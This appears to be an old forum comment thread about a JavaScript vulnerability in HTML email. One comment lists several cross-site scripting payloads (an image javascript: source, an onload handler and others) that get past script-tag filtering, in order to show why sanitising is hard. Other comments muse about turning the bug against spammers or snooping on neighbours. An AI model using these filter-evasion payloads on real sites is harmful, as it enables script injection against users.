I think that I should be worried or annoyed by this but I (we) are so used to security holes, lack of privacy online, and spam that the general level of interest I can come up with is pretty minimal. On the one hand, its pretty sad that there is so much of this stuff that we are desensitized to it; on the other hand, the Internet is still like the Wild West in a sense - its a frontier with the requisite frontier mentality. I'm sure this has been said elsewhere better than I am saying it, but I think that the dynamic of those pushing the boundaries with advances versus those who try to expolit those boundaries versus those that try and stop them creates a better future world. Those of us on the fringes may be the occasional casuality, but maybe, just maybe, its for the greater good...
There is no guarantee that the content has been read or understood.
Sorry, I should have used extrans mode
filtering script tags in far from enough.
There are numerous ways to have script executed in a page.
to name few:
<script language=javascript>alert('foo')</script>
<img src="javascript:alert('foo')">
<img src="mocha:"alert('foo');>
<img src="" onload="alert('foo')">
btw if IE finds a \0 anywhere in a page it is just stripped out. Your parser would have to take this into account.
That's not true. Set your client to always respond with pure text AND set your client not to execute Javascript.
No mail sent to you will trigger this vulnerability and no mail sent from (or through) you will trigger this vulnerability.
Outlook Express supports these settings.
Tastes Like Chicken
As if we needed another reason to detest HTML email. Getting a mailbox full of 2-line 14K messages was already annoying enough. Now that the NY Times has unleashed the BIG SECRET about HTML mail we can expect the script kiddies to realise they can VIEW the source and even copy Javascript code. Oh, joy.
Personally, I'm a Luddite, and Telnet into my ISP's POP server from work. I just give the client a huge buffer and watch the tags scroll by for fun.
- mindVapour
Spot who didn't READthe article (or even the summary)...
It doesn't matter if YOUR email client is javascript enabled or disabled, if the person you are emailing has theirs enabled.
Nex ttime, read the article before commenting, huh?
--
People should not be afraid of their governments - Governments should be afraid of their people.
This is why I have an email address which I never tell anyone about. That way I am sure that I will never get any spam or stupid emails through it. The funny thing is that I never get any other mail through it either.
If you want to email me, think baseball.
Fight Spammers!
http://www.geocities.com/ResearchTriangle/Facility /8332/reaper-exploit-release.html
Anyone consider the possibility of doing the same, but targeting the people who we'd ALL love to get rid of? I'm talking about Spammers, of course. Email bug, non-malicious javascript coding that "phones home" and gives you information about Spammers, if the reply to address or postmaster sent @ spammer domain email is opened. Hmmm... Instead of freaking out over every exploit that pops up and scrambling to get patches, I wonder why people don't use it as an opportunity to their own benefit for the greater good.
I've been thinking of joining the @home service just so I can crack into my neighbors' browser histories and caches. At the next homeowners association meeting, I won't say a word. I swear.
www.ridiculopathy.com